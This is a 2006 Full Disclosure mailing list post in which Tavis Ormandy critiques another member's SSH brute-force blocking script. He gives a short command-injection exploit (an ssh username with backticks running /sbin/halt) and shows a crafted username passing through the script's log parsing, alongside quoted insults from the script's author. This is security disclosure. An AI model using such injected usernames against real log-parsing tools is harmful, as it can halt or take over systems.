Full Disclosure mailing list archives

Re: SSH brute force blocking tool

From: Tavis Ormandy <taviso () gentoo org>
Date: Mon, 27 Nov 2006 21:02:31 +0000

On Mon, Nov 27, 2006 at 03:51:39PM -0500, J. Oquendo wrote:

Tavis Ormandy wrote:


Nice work, really subtle rootkit. I like the email phone-home.

Here's an exploit.

#!/bin/sh
ssh 'foo bar `/sbin/halt`'@victim


Since you seem to be clueless I'll answer step by step. Here goes idiot. 
(Sinful to see someone so clueless coming from Gentoo... Guess it goes 
with the romper room Linux territory)
/////
awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru >> 
/tmp/hosts.deny


insecure temporary file creation, race condition if a user can create
that file between the unlink and the open.

$ ssh "error retrieving"@localhost & ssh '`0wn3d`'@localhost
$ awk '/error retrieving/{getline;print $13}' /var/log/authlog
`0wn3d`

Oops.

Thanks, Tavis.

-- 
-------------------------------------
taviso () sdf lonestar org | finger me for my pgp key.
-------------------------------------------------------

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

SSH brute force blocking tool J. Oquendo (Nov 27)
- Re: SSH brute force blocking tool Tavis Ormandy (Nov 27)
  - Re: SSH brute force blocking tool J. Oquendo (Nov 27)
    - Re: SSH brute force blocking tool Tavis Ormandy (Nov 27)
    - Re: SSH brute force blocking tool J. Oquendo (Nov 27)
    - Re: SSH brute force blocking tool Tavis Ormandy (Nov 27)
    - Re: SSH brute force blocking tool J. Oquendo (Nov 27)
    - Re: SSH brute force blocking tool Tavis Ormandy (Nov 27)
    - Re: SSH brute force blocking tool gabriel rosenkoetter (Nov 27)
    - Re: SSH brute force blocking tool J. Oquendo (Nov 27)
    - Re: SSH brute force blocking tool Tavis Ormandy (Nov 27)
    - Re: SSH brute force blocking tool gabriel rosenkoetter (Nov 27)
    - Re: SSH brute force blocking tool J. Oquendo (Nov 27)
    - Re: SSH brute force blocking tool J. Oquendo (Nov 27)

(Thread continues...)